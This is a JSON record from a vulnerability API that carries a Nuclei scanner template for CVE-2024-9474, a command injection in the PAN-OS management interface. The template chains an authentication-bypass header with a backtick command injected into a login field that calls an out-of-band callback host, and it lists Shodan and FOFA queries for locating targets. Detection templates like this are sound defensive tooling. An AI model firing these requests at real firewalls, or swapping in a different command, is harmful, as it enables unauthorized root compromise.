{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-9474/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-9474/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-9474/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-9474/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-9474/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-9474"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-9474"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-9474.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2024-9474\n\ninfo:\n  name: PAN-OS Management Web Interface - Command Injection\n  author: watchTowr,iamnoooob,rootxharsh,pdresearch\n  severity: high\n  description: |\n    A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.\n    Cloud NGFW and Prisma Access are not impacted by this vulnerability.\n  impact: |\n    Authenticated administrators with access to the management web interface can escalate privileges to execute commands with root privileges on the PAN-OS firewall, achieving complete system control and bypassing security controls.\n  remediation: |\n    Apply security updates from Palo Alto Networks to address the privilege escalation and command injection vulnerability in the PAN-OS management web interface.\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 7.2\n    cve-id: CVE-2024-9474\n    cwe-id: CWE-78\n    epss-score: 0.94701\n    epss-percentile: 0.99856\n    cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: paloaltonetworks\n    product: pan-os\n    shodan-query:\n      - cpe:\"cpe:2.3:o:paloaltonetworks:pan-os\"\n      - http.favicon.hash:\"-631559155\"\n    fofa-query: icon_hash=\"-631559155\"\n  tags: cve,cve2024,panos,rce,kev,vkev,vuln\n\nflow: http(1) && http(2) && http(3)\n\nvariables:\n  rand: \"{{to_lower(rand_text_alpha(5))}}\"\n\nhttp:\n  - raw:\n      - |\n        GET /php/utils/CmsGetDeviceSoftwareVersion.php/.js.map HTTP/1.1\n        Host: {{Hostname}}\n        X-PAN-AUTHCHECK: off\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"0.0.0\")'\n          - 'contains_all(header, \"Expires: 0\", \"PHPSESSID=\", \"application/json\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /php/utils/createRemoteAppwebSession.php/{{rand}}.js.map HTTP/1.1\n        Host: {{Hostname}}\n        X-PAN-AUTHCHECK: off\n        Content-Type: application/x-www-form-urlencoded\n\n        user=`curl+{{interactsh-url}}`&userRole=superuser&remoteHost=&vsys=vsys1\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"@start@PHPSESSID=\"\n        internal: true\n\n    extractors:\n      - type: regex\n        part: body\n        name: phpsessid\n        group: 1\n        regex:\n          - '@start@PHPSESSID=(.*?)@end@'\n        internal: true\n\n  - raw:\n      - |\n        GET /index.php/.js.map HTTP/1.1\n        Host: {{Hostname}}\n        Cookie: PHPSESSID={{phpsessid}}\n        X-PAN-AUTHCHECK: off\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"dns\")'\n          - 'contains(body, \"panos\")'\n        condition: and\n# digest: 4b0a00483046022100937a0e54616f8b7a23c118098bf57503d80a50d10bf91779a478478a4fef1431022100bd478f02681e54ac16a12bc90725eee787d7c6fe38465dff25a879f2bc2e1160:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-9474"
}